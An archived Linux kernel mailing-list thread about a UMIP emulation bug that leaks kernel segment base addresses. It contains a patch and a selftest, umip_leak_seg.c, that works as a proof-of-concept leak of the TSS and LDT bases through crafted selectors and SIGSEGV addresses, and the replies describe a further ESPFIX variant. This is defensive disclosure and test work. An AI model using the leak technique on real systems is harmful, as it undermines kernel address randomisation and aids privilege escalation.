linux-kernel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
@ 2023-12-06  0:43 Michal Luczaj
  2023-12-06  0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
                   ` (3 more replies)
  0 siblings, 4 replies; 7+ messages in thread
From: Michal Luczaj @ 2023-12-06  0:43 UTC (permalink / raw)
  To: x86
  Cc: tglx, mingo, bp, dave.hansen, shuah, luto, torvalds,
	linux-kernel, Michal Luczaj

User space executing opcode SGDT on a UMIP-enabled CPU results in
#GP(0). In an effort to support legacy applications, #GP handler calls
fixup_umip_exception() to patch up the exception and return a dummy
value:

	if (static_cpu_has(X86_FEATURE_UMIP)) {
		if (user_mode(regs) && fixup_umip_exception(regs))
			goto exit;
	}

SGDT is emulated by decoding the instruction and copying dummy data to
the memory address specified by the operand:

	uaddr = insn_get_addr_ref(&insn, regs);
	if ((unsigned long)uaddr == -1L)
		return false;

	nr_copied = copy_to_user(uaddr, dummy_data, dummy_data_size);
	if (nr_copied  > 0) {
		/*
		 * If copy fails, send a signal and tell caller that
		 * fault was fixed up.
		 */
		force_sig_info_umip_fault(uaddr, regs);
		return true;
	}

Decoder handles segmentation, so for "sgdt %ss:(%rax)" the value of
`uaddr` will be correctly (in compatibility mode) shifted by the base
address of the segment. There's a catch though: decoder does not check
segment's DPL, nor its type.

ptrace() can be used to prepare a RPL=3 selector for a S=0/DPL=0
segment, potentially one with a kernel space base address. On return to
user space, CPU will reject such selector load; exception will be
raised. But because the #GP handler sees no distinction between
SGDT-induced #GP(0) and IRET-induced #GP(selector), emulator will kick
in and process the malformed @regs->ss.

If the first 4 GiB of user space are unmapped or non-writable,
copy_to_user() will fail, and signal to user will reveal `uaddr` -- i.e.
the (part of) kernel address. On x86_64, addresses of GDT_ENTRY_TSS (for
each CPU) and GDT_ENTRY_LDT (when in use) can be fully leaked in a few
steps.

Introducing a DPL check in insn_get_seg_base(), or even in get_desc(),
seems enough to prevent the decoder from disclosing data.

diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
index 558a605929db..4c1eea736519 100644
--- a/arch/x86/lib/insn-eval.c
+++ b/arch/x86/lib/insn-eval.c
@@ -725,6 +725,18 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
 	if (!get_desc(&desc, sel))
 		return -1L;
 
+	/*
+	 * Some segment selectors coming from @regs do not necessarily reflect
+	 * the state of CPU; see get_segment_selector(). Their values might
+	 * have been altered by ptrace. Thus, the instruction decoder can be
+	 * tricked into "dereferencing" a segment descriptor that would
+	 * otherwise cause a CPU exception -- for example due to mismatched
+	 * privilege levels. This opens up the possibility to expose kernel
+	 * space base address of DPL=0 segments.
+	 */
+	if (desc.dpl < (regs->cs & SEGMENT_RPL_MASK))
+		return -1L;
+
 	return get_desc_base(&desc);
 }
 
That said, I guess instead of trying to harden the decoder, it would be
better to ensure any emulation is attempted only when @regs do for sure
reflect the state of CPU. I.e. when #GP comes directly from the user
space, not via a bad IRET.

In other words, can the context be somehow tainted during bad IRET
handling -- signalling to the #GP handler that emulation should be
avoided?

Now, I'm far from being competent, but here's an idea I've tried: tell
the #GP handler that UMIP-related exceptions come only as #GP(0):

 	if (static_cpu_has(X86_FEATURE_UMIP)) {
-		if (user_mode(regs) && fixup_umip_exception(regs))
+		if (user_mode(regs) && !error_code && fixup_umip_exception(regs))
 			goto exit;
 	}

To my understanding of Intel SDM, a bad IRET can theoretically cause a
#GP(0), too. So for that occasion, would it be okay to "poison" the
value of error code in fixup_bad_iret()? Along the lines of:

 	/* Copy the remainder of the stack from the current stack. */
 	__memcpy(&tmp, bad_regs, offsetof(struct pt_regs, ip));
 
+	/* Suppress the error code. */
+	tmp.orig_ax = -1UL;
+
 	/* Update the entry stack */
 	__memcpy(new_stack, &tmp, sizeof(tmp));

Admittedly, this feels hackish. And I've realized there's also the case
of ESPFIX: #DF handler explicitly sets up a #GP(0) frame before
forwarding the execution to the #GP handler.

Thanks,
Michal

Michal Luczaj (2):
  x86/traps: Attempt UMIP fixup only on #GP(0)
  selftests/x86: UMIP DPL=0 segment base address info leak test

 arch/x86/kernel/traps.c                     |   2 +-
 tools/testing/selftests/x86/Makefile        |   6 +-
 tools/testing/selftests/x86/umip_leak_seg.c | 249 ++++++++++++++++++++
 3 files changed, 255 insertions(+), 2 deletions(-)
 create mode 100644 tools/testing/selftests/x86/umip_leak_seg.c

-- 
2.43.0


^ permalink raw reply related	[flat|nested] 7+ messages in thread

* [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0)
  2023-12-06  0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
@ 2023-12-06  0:43 ` Michal Luczaj
  2023-12-06  0:43 ` [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test Michal Luczaj
                   ` (2 subsequent siblings)
  3 siblings, 0 replies; 7+ messages in thread
From: Michal Luczaj @ 2023-12-06  0:43 UTC (permalink / raw)
  To: x86
  Cc: tglx, mingo, bp, dave.hansen, shuah, luto, torvalds,
	linux-kernel, Michal Luczaj

Do not allow for UMIP exception fixup if the exception did not come
directly from the user space. This excludes #GP due to a bad IRET.

Signed-off-by: Michal Luczaj <mhal@rbox.co>
---
 arch/x86/kernel/traps.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
index c876f1d36a81..1daa7cd9a76c 100644
--- a/arch/x86/kernel/traps.c
+++ b/arch/x86/kernel/traps.c
@@ -651,7 +651,7 @@ DEFINE_IDTENTRY_ERRORCODE(exc_general_protection)
 	cond_local_irq_enable(regs);
 
 	if (static_cpu_has(X86_FEATURE_UMIP)) {
-		if (user_mode(regs) && fixup_umip_exception(regs))
+		if (user_mode(regs) && !error_code && fixup_umip_exception(regs))
 			goto exit;
 	}
 
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 7+ messages in thread

* [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test
  2023-12-06  0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
  2023-12-06  0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
@ 2023-12-06  0:43 ` Michal Luczaj
  2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
  2023-12-09 17:16 ` Brian Gerst
  3 siblings, 0 replies; 7+ messages in thread
From: Michal Luczaj @ 2023-12-06  0:43 UTC (permalink / raw)
  To: x86
  Cc: tglx, mingo, bp, dave.hansen, shuah, luto, torvalds,
	linux-kernel, Michal Luczaj

Test for UMIP-related opcode emulation revealing the base address of
DPL=0 segments.

Suggested-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Michal Luczaj <mhal@rbox.co>
---
I understand that code quoted in comments tend to bit rot badly. Feel free
to chop it off.

 tools/testing/selftests/x86/Makefile        |   6 +-
 tools/testing/selftests/x86/umip_leak_seg.c | 249 ++++++++++++++++++++
 2 files changed, 254 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/umip_leak_seg.c

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0b872c0a42d2..262cda802c87 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -19,7 +19,8 @@ TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
 TARGETS_C_64BIT_ONLY := fsgsbase sysret_rip syscall_numbering \
-			corrupt_xstate_header amx lam test_shadow_stack
+			corrupt_xstate_header amx lam test_shadow_stack \
+			umip_leak_seg
 # Some selftests require 32bit support enabled also on 64bit systems
 TARGETS_C_32BIT_NEEDED := ldt_gdt ptrace_syscall
 
@@ -113,3 +114,6 @@ $(OUTPUT)/check_initial_reg_state_64: CFLAGS += -Wl,-ereal_start -static
 
 $(OUTPUT)/nx_stack_32: CFLAGS += -Wl,-z,noexecstack
 $(OUTPUT)/nx_stack_64: CFLAGS += -Wl,-z,noexecstack
+
+# umip_leak_seg expects the first 4GiB of address space to be non-writable
+$(OUTPUT)/umip_leak_seg_64: CFLAGS += -pie -fPIE -Wl,-Ttext-segment=0x100000000
diff --git a/tools/testing/selftests/x86/umip_leak_seg.c b/tools/testing/selftests/x86/umip_leak_seg.c
new file mode 100644
index 000000000000..422d63c0ac50
--- /dev/null
+++ b/tools/testing/selftests/x86/umip_leak_seg.c
@@ -0,0 +1,249 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * umip_leak_seg.c - Test for user space retrieving a DPL=0 segment base
+ * address via UMIP instruction decoding/emulation.
+ *
+ * User space executing opcode SGDT on a UMIP-enabled CPU results in
+ * #GP(0). In an effort to support legacy applications, #GP handler calls
+ * fixup_umip_exception() to patch up the exception and return a dummy
+ * value.
+ *
+ * SGDT is emulated by decoding the instruction and copying dummy data to
+ * the memory address specified by the operand:
+ *
+ *	uaddr = insn_get_addr_ref(&insn, regs);
+ *	if ((unsigned long)uaddr == -1L)
+ *		return false;
+ *
+ *	nr_copied = copy_to_user(uaddr, dummy_data, dummy_data_size);
+ *	if (nr_copied  > 0) {
+ *		/ *
+ *		 * If copy fails, send a signal and tell caller that
+ *		 * fault was fixed up.
+ *		 * /
+ *		force_sig_info_umip_fault(uaddr, regs);
+ *		return true;
+ *	}
+ *
+ * Decoder handles segmentation, so for "sgdt %ss:(%rax)" the value of
+ * `uaddr` will be correctly (in compatibility mode) shifted by the base
+ * address of the segment. There's a catch though: decoder does not check
+ * segment's DPL, nor its type.
+ *
+ * ptrace() can be used to prepare a RPL=3 selector for a S=0/DPL=0
+ * segment, potentially one with a kernel space base address. On return to
+ * user space, CPU will reject such selector load; exception will be
+ * raised. But because the #GP handler sees no distinction between
+ * SGDT-induced #GP(0) and IRET-induced #GP(selector), emulator will kick
+ * in and process the malformed @regs->ss.
+ *
+ * If the first 4 GiB of user space are unmapped or non-writable,
+ * copy_to_user() will fail, and signal to user will reveal `uaddr` -- i.e.
+ * the (part of) kernel address. On x86_64, addresses of GDT_ENTRY_TSS (for
+ * each CPU) and GDT_ENTRY_LDT (when in use) can be fully leaked in a few
+ * steps.
+ *
+ * This selftest makes sure that selectors belonging to kernel are not
+ * passed to UMIP emulation logic on #GP. CPU#0's TSS and the current
+ * task's LDT are tried for that. Code is compiled with
+ * -Ttext-segment=0x100000000 to reserve the initial 4 GiB, so that
+ * SIGSEGV's siginfo_t::si_addr can be reliably caught. As an alternative
+ * to ptrace(), sigreturn() is used for setting illegal selector value.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <signal.h>
+#include <setjmp.h>
+#include <assert.h>
+#include <sched.h>
+#include <errno.h>
+#include <err.h>
+
+#include <sys/syscall.h>
+#include <sys/user.h>
+#include <asm/ldt.h>
+
+/* grep arch/x86/include/asm/segment.h */
+#define GDT_ENTRY_DEFAULT_USER32_CS	4
+#define GDT_ENTRY_TSS			8
+#define GDT_ENTRY_LDT			10
+
+#define USER_RPL	3
+
+static int umip_leak_seg;
+static int umip_leak_ax;
+static long umip_leak_kmem;
+static sigjmp_buf buf;
+
+static __attribute__((naked)) void sgdt(void)
+{
+	asm volatile ("sgdt %ss:(%rax)");
+}
+
+/*
+ * Make sure the first 4 GiB are not mapped.
+ */
+static void check_vm(void)
+{
+	unsigned long start;
+	FILE *f;
+
+	f = fopen("/proc/self/maps", "r");
+	if (!f)
+		err(1, "fopen");
+
+	if (fscanf(f, "%lx-", &start) != 1 || start < (1UL << 32))
+		errx(1, "First 4 GiB need to be unmapped");
+
+	fclose(f);
+}
+
+/*
+ * arch/x86/kernel/ldt.c:
+ *	if (alloc_size > PAGE_SIZE)
+ *		new_ldt->entries = __vmalloc(alloc_size, GFP_KERNEL_ACCOUNT | __GFP_ZERO);
+ *	else
+ *		new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
+ */
+static void force_ldt_vmalloc(void)
+{
+	struct user_desc desc = { .entry_number = LDT_ENTRIES - 1 };
+	int ret;
+
+	ret = syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
+	if (ret) {
+		errno = -ret;
+		err(1, "modify_ldt");
+	}
+}
+
+static void set_handler(int sig, void (*handler)(int, siginfo_t *, void *))
+{
+	struct sigaction sa;
+
+	memset(&sa, 0, sizeof(sa));
+
+	sa.sa_sigaction = handler;
+	sa.sa_flags = SA_SIGINFO;
+	sigemptyset(&sa.sa_mask);
+
+	if (sigaction(sig, &sa, 0))
+		err(1, "sigaction");
+}
+
+static void sigusr1(int sig, siginfo_t *info, void *ctx_void)
+{
+	ucontext_t *ctx = (ucontext_t *)ctx_void;
+	struct selectors {
+		unsigned short cs, gs, fs, ss;
+	} *sel = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
+
+	sel->cs = (GDT_ENTRY_DEFAULT_USER32_CS << 3) | USER_RPL;
+	sel->ss = (umip_leak_seg << 3) | USER_RPL;
+	ctx->uc_mcontext.gregs[REG_RAX] = umip_leak_ax;
+	ctx->uc_mcontext.gregs[REG_RIP] = (greg_t)&sgdt;
+}
+
+static void sigsegv(int sig, siginfo_t *info, void *ctx_void)
+{
+	assert((intptr_t)info->si_addr >> 32 == 0);
+
+	if (info->si_code & SI_KERNEL)
+		umip_leak_kmem = -1L;
+	else
+		umip_leak_kmem = (intptr_t)info->si_addr;
+
+	siglongjmp(buf, 1);
+}
+
+static long leak(int seg, int ax)
+{
+	umip_leak_seg = seg;
+	umip_leak_ax = ax;
+
+	if (sigsetjmp(buf, 1))
+		return umip_leak_kmem;
+
+	raise(SIGUSR1);
+	assert(!"unreachable");
+}
+
+static long find_limit(int seg)
+{
+	int limit = 0xffff;
+
+	/* Assuming desc::g and desc::limit1 are zero. */
+	while (limit >= 0 && leak(seg, limit) < 0)
+		limit--;
+
+	return limit;
+}
+
+static int fetch_base(char *seg_name, int seg)
+{
+	long base = leak(seg, 0);
+
+	if (base != -1) {
+		/*
+		 * We're aiming here at a long mode segment descriptor that's
+		 * taking two legacy-mode-sized entries in the GDT.
+		 * Base Address[63:32] of n-th entry will be leaked in two
+		 * steps: from Segment Limit[15:0] and Base Address[15:0] of
+		 * (n+1)-th entry.
+		 */
+		base |= find_limit(seg + 1) << 32;
+		base |= leak(seg + 1, 0) << 48;
+
+		printf("[FAIL]\t%s base leaked: %#zx\n", seg_name, base);
+		return 1;
+	}
+
+	printf("[OK]\t%s base: no leaks\n", seg_name);
+	return 0;
+}
+
+static int dump_TSS(void)
+{
+	cpu_set_t old, new;
+	int ret;
+
+	if (sched_getaffinity(0, sizeof(old), &old))
+		err(1, "sched_getaffinity");
+
+	CPU_ZERO(&new);
+	CPU_SET(0, &new);
+
+	if (sched_setaffinity(0, sizeof(new), &new))
+		err(1, "sched_setaffinity");
+
+	ret = fetch_base("CPU#0 TSS", GDT_ENTRY_TSS);
+
+	if (sched_setaffinity(0, sizeof(old), &old))
+		err(1, "sched_setaffinity restore");
+
+	return ret;
+}
+
+static int dump_LDT(void)
+{
+	force_ldt_vmalloc();
+	return fetch_base("LDT", GDT_ENTRY_LDT);
+}
+
+int main(void)
+{
+	int status;
+
+	check_vm();
+
+	set_handler(SIGUSR1, sigusr1);
+	set_handler(SIGSEGV, sigsegv);
+
+	status  = dump_TSS();
+	status |= dump_LDT();
+
+	return status;
+}
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 7+ messages in thread

* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
  2023-12-06  0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
  2023-12-06  0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
  2023-12-06  0:43 ` [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test Michal Luczaj
@ 2023-12-09 15:53 ` Borislav Petkov
  2023-12-10 17:08   ` Michal Luczaj
  2023-12-09 17:16 ` Brian Gerst
  3 siblings, 1 reply; 7+ messages in thread
From: Borislav Petkov @ 2023-12-09 15:53 UTC (permalink / raw)
  To: Michal Luczaj
  Cc: x86, tglx, mingo, dave.hansen, shuah, luto, torvalds, linux-kernel

On Wed, Dec 06, 2023 at 01:43:43AM +0100, Michal Luczaj wrote:
> Introducing a DPL check in insn_get_seg_base(), or even in get_desc(),
> seems enough to prevent the decoder from disclosing data.
> 
> diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
> index 558a605929db..4c1eea736519 100644
> --- a/arch/x86/lib/insn-eval.c
> +++ b/arch/x86/lib/insn-eval.c
> @@ -725,6 +725,18 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
>  	if (!get_desc(&desc, sel))
>  		return -1L;
>  
> +	/*
> +	 * Some segment selectors coming from @regs do not necessarily reflect
> +	 * the state of CPU; see get_segment_selector(). Their values might
> +	 * have been altered by ptrace. Thus, the instruction decoder can be
> +	 * tricked into "dereferencing" a segment descriptor that would
> +	 * otherwise cause a CPU exception -- for example due to mismatched
> +	 * privilege levels. This opens up the possibility to expose kernel
> +	 * space base address of DPL=0 segments.
> +	 */
> +	if (desc.dpl < (regs->cs & SEGMENT_RPL_MASK))
> +		return -1L;
> +
>  	return get_desc_base(&desc);
>  }
>  
> That said, I guess instead of trying to harden the decoder,

Well, here's what my CPU manual says:

"4.10.1 Accessing Data Segments

...

The processor compares the effective privilege level with the DPL in the
descriptor-table entry referenced by the segment selector. If the
effective privilege level is greater than or equal to (numerically
lower-than or equal-to) the DPL, then the processor loads the segment
register with the data-segment selector. 

If the effective privilege level is lower than (numerically
greater-than) the DPL, a general-protection exception (#GP) occurs and
the segment register is not loaded.

...

4.10.2 Accessing Stack Segments

The processor compares the CPL with the DPL in the descriptor-table
entry referenced by the segment selector. The two values must be equal.
If they are not equal, a #GP occurs and the SS register is not loaded."

So *actually* doing those checks in the insn decoder is the proper thing
to do, IMNSVHO.

> Now, I'm far from being competent, but here's an idea I've tried: tell
> the #GP handler that UMIP-related exceptions come only as #GP(0):
> 
>  	if (static_cpu_has(X86_FEATURE_UMIP)) {
> -		if (user_mode(regs) && fixup_umip_exception(regs))
> +		if (user_mode(regs) && !error_code && fixup_umip_exception(regs))
>  			goto exit;
>  	}

And yap, as you've realized, that alone doesn't fix the leaking.

Thx.

-- 
Regards/Gruss,
    Boris.

https://people.kernel.org/tglx/notes-about-netiquette

^ permalink raw reply	[flat|nested] 7+ messages in thread

* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
  2023-12-06  0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
                   ` (2 preceding siblings ...)
  2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
@ 2023-12-09 17:16 ` Brian Gerst
  2023-12-09 20:08   ` Linus Torvalds
  3 siblings, 1 reply; 7+ messages in thread
From: Brian Gerst @ 2023-12-09 17:16 UTC (permalink / raw)
  To: Michal Luczaj
  Cc: x86, tglx, mingo, bp, dave.hansen, shuah, luto, torvalds, linux-kernel

On Tue, Dec 5, 2023 at 8:22 PM Michal Luczaj <mhal@rbox.co> wrote:
>
> User space executing opcode SGDT on a UMIP-enabled CPU results in
> #GP(0). In an effort to support legacy applications, #GP handler calls
> fixup_umip_exception() to patch up the exception and return a dummy
> value:
>
>         if (static_cpu_has(X86_FEATURE_UMIP)) {
>                 if (user_mode(regs) && fixup_umip_exception(regs))
>                         goto exit;
>         }
>
> SGDT is emulated by decoding the instruction and copying dummy data to
> the memory address specified by the operand:
>
>         uaddr = insn_get_addr_ref(&insn, regs);
>         if ((unsigned long)uaddr == -1L)
>                 return false;
>
>         nr_copied = copy_to_user(uaddr, dummy_data, dummy_data_size);
>         if (nr_copied  > 0) {
>                 /*
>                  * If copy fails, send a signal and tell caller that
>                  * fault was fixed up.
>                  */
>                 force_sig_info_umip_fault(uaddr, regs);
>                 return true;
>         }
>
> Decoder handles segmentation, so for "sgdt %ss:(%rax)" the value of
> `uaddr` will be correctly (in compatibility mode) shifted by the base
> address of the segment. There's a catch though: decoder does not check
> segment's DPL, nor its type.
>
> ptrace() can be used to prepare a RPL=3 selector for a S=0/DPL=0
> segment, potentially one with a kernel space base address. On return to
> user space, CPU will reject such selector load; exception will be
> raised. But because the #GP handler sees no distinction between
> SGDT-induced #GP(0) and IRET-induced #GP(selector), emulator will kick
> in and process the malformed @regs->ss.
>
> If the first 4 GiB of user space are unmapped or non-writable,
> copy_to_user() will fail, and signal to user will reveal `uaddr` -- i.e.
> the (part of) kernel address. On x86_64, addresses of GDT_ENTRY_TSS (for
> each CPU) and GDT_ENTRY_LDT (when in use) can be fully leaked in a few
> steps.

A different way to plug this is to harden ptrace (and sigreturn) to
verify that the segments are code or data type segments instead of
relying on an IRET fault.

Brian Gerst

^ permalink raw reply	[flat|nested] 7+ messages in thread

* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
  2023-12-09 17:16 ` Brian Gerst
@ 2023-12-09 20:08   ` Linus Torvalds
  0 siblings, 0 replies; 7+ messages in thread
From: Linus Torvalds @ 2023-12-09 20:08 UTC (permalink / raw)
  To: Brian Gerst
  Cc: Michal Luczaj, x86, tglx, mingo, bp, dave.hansen, shuah, luto,
	linux-kernel

On Sat, 9 Dec 2023 at 09:16, Brian Gerst <brgerst@gmail.com> wrote:
>
> A different way to plug this is to harden ptrace (and sigreturn) to
> verify that the segments are code or data type segments instead of
> relying on an IRET fault.

I think that is likely a good idea regardless of this particular issue.

And I don't think you need to even check the segment for any kind of
validity - all you need to check that it's a valid selector.

And we *kind* of do that already, with the x86 ptrace code checking

  static inline bool invalid_selector(u16 value)
  {
        return unlikely(value != 0 && (value & SEGMENT_RPL_MASK) != USER_RPL);
  }

but the thing is, I think we could limit that a lot more.

I think the only valid GDT entries are 0-15 (that includes the default
kernel segments, but they don't contain anything interesting), so we
could tighten that selector check to say that it has to be either a
LDT entry or a selector < 15.

So add some kind of requirement for "(value & 4) || (value < 8*16)", perhaps?

              Linus

^ permalink raw reply	[flat|nested] 7+ messages in thread

* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
  2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
@ 2023-12-10 17:08   ` Michal Luczaj
  0 siblings, 0 replies; 7+ messages in thread
From: Michal Luczaj @ 2023-12-10 17:08 UTC (permalink / raw)
  To: Borislav Petkov
  Cc: x86, tglx, mingo, dave.hansen, shuah, luto, torvalds, linux-kernel

On 12/9/23 16:53, Borislav Petkov wrote:
> On Wed, Dec 06, 2023 at 01:43:43AM +0100, Michal Luczaj wrote:
>> Introducing a DPL check in insn_get_seg_base(), or even in get_desc(),
>> seems enough to prevent the decoder from disclosing data.
>>
>> diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
>> index 558a605929db..4c1eea736519 100644
>> --- a/arch/x86/lib/insn-eval.c
>> +++ b/arch/x86/lib/insn-eval.c
>> @@ -725,6 +725,18 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
>>  	if (!get_desc(&desc, sel))
>>  		return -1L;
>>  
>> +	/*
>> +	 * Some segment selectors coming from @regs do not necessarily reflect
>> +	 * the state of CPU; see get_segment_selector(). Their values might
>> +	 * have been altered by ptrace. Thus, the instruction decoder can be
>> +	 * tricked into "dereferencing" a segment descriptor that would
>> +	 * otherwise cause a CPU exception -- for example due to mismatched
>> +	 * privilege levels. This opens up the possibility to expose kernel
>> +	 * space base address of DPL=0 segments.
>> +	 */
>> +	if (desc.dpl < (regs->cs & SEGMENT_RPL_MASK))
>> +		return -1L;
>> +
>>  	return get_desc_base(&desc);
>>  }
>>  
>> That said, I guess instead of trying to harden the decoder,
> 
> Well, here's what my CPU manual says:
> 
> "4.10.1 Accessing Data Segments
> 
> ...
> 
> The processor compares the effective privilege level with the DPL in the
> descriptor-table entry referenced by the segment selector. If the
> effective privilege level is greater than or equal to (numerically
> lower-than or equal-to) the DPL, then the processor loads the segment
> register with the data-segment selector. 
> 
> If the effective privilege level is lower than (numerically
> greater-than) the DPL, a general-protection exception (#GP) occurs and
> the segment register is not loaded.
> 
> ...
> 
> 4.10.2 Accessing Stack Segments
> 
> The processor compares the CPL with the DPL in the descriptor-table
> entry referenced by the segment selector. The two values must be equal.
> If they are not equal, a #GP occurs and the SS register is not loaded."
>
> So *actually* doing those checks in the insn decoder is the proper thing
> to do, IMNSVHO.

Are you suggesting checking only CPL vs. DPL or making sure the insn
decoder faithfully emulates all the other stuff CPU does? Like the desc.s
issue described below.

>> Now, I'm far from being competent, but here's an idea I've tried: tell
>> the #GP handler that UMIP-related exceptions come only as #GP(0):
>>
>>  	if (static_cpu_has(X86_FEATURE_UMIP)) {
>> -		if (user_mode(regs) && fixup_umip_exception(regs))
>> +		if (user_mode(regs) && !error_code && fixup_umip_exception(regs))
>>  			goto exit;
>>  	}
> 
> And yap, as you've realized, that alone doesn't fix the leaking.

With this fix applied, I can't see any way to sufficiently confuse the
UMIP emulation with a non-ESPFIX bad IRET. It appears that #GP(selector)
takes precedence over #GP(0), so tripping IRET with any malformed selector
always ends up with #GP handler's error_code != 0, even if conditions were
met for #GP(0) just as well. Is there something I'm missing?

That said, there's still the case of #DF handler feeding #GP handler after
a fault in ESPFIX. Consider

	cs = (GDT_ENTRY_TSS << 3) | USER_RPL
	ss = (SOME_LDT_ENTRY << 3) | SEGMENT_LDT | USER_RPL
	ip = "sgdt %cs:(%reg)"

Attempting IRET with such illegal CS raises #GP(selector), but (because of
ESPFIX) this #GP is promoted to #DF where it becomes #GP(0). And UMIP
emulation is triggered.

UMIP emulator starts by fetching code from user. insn decoder does
`copy_from_user(buf, (void __user *)ip, MAX_INSN_SIZE)` where `ip` is
CS.base+IP and CS.base here is actually a (part of) GDT_ENTRY_TSS.base, a
kernel address. With IP under user's control, no fault while copying.

Next, insn_get_code_seg_params() concludes that, given TSS as a code
segment, address and operand size are both 16-bit. Prefix SGDT with size
overrides, and we're back to 32-bit. Then insn_get_addr_ref() and
copy_to_user() does the leaking.

I don't know if/how to deal with ESPFIX losing #GP's error code. As for
telling insn decoder that system segments aren't code:

--- a/arch/x86/lib/insn-eval.c
+++ b/arch/x86/lib/insn-eval.c
@@ -809,6 +809,10 @@ int insn_get_code_seg_params(struct pt_regs *regs)
        if (!get_desc(&desc, sel))
                return -EINVAL;

+       /* System segments are not code. */
+       if (!desc.s)
+               return -EINVAL;
+
        /*
         * The most significant byte of the Type field of the segment descriptor
         * determines whether a segment contains data or code. If this is a data

Is this something in the right direction?

(Note, get_segment_selector() is broken for selectors with the high bit
set. I'll send patch later.)

thanks,
Michal

^ permalink raw reply	[flat|nested] 7+ messages in thread

end of thread, other threads:[~2023-12-10 17:17 UTC | newest]

Thread overview: 7+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-12-06  0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
2023-12-06  0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
2023-12-06  0:43 ` [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test Michal Luczaj
2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
2023-12-10 17:08   ` Michal Luczaj
2023-12-09 17:16 ` Brian Gerst
2023-12-09 20:08   ` Linus Torvalds

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).